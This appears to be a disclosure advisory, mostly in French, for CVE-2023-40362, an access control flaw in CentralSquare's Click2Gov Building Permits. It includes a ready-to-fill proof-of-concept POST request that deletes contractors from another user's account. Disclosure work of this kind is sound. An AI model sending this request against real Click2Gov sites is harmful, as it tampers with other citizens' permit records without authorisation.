
CVE-2023-40362 Vulnerabilitiy details and proof of concept
CVE-2023-40362 détails de la vulnérabilité et preuve de concept.
Une vulnérabilité de contrôle d'accès dans Click2Gov BP au niveau de l'URI /Click2GovBP/mastercontractorlist.html permet aux utilisateurs authentifiés de supprimer les contractants des comptes d'autres utilisateurs en utilisant l'ID utilisateur de la victime et les informations du contractant à supprimer.
Cela est dû à l'incapacité de l'application web à vérifier que l'utilisateur est autorisé à supprimer le contractant du compte dont l'ID utilisateur est spécifié.
Vendeur : CentralSquare
Signalé par : Ally Petitt
Découvert : 13 juin 2023
Produits concernés : Click2Gov Building Permits (BP)
Versions concernées : Avant octobre 2023
CVSS v3 : 5.4 - Modéré (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
La requête HTTP POST ci-dessous peut être effectuée pour supprimer un contractant du compte d'une victime. Le jeton CSRF doit être valide pour que cela fonctionne.
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>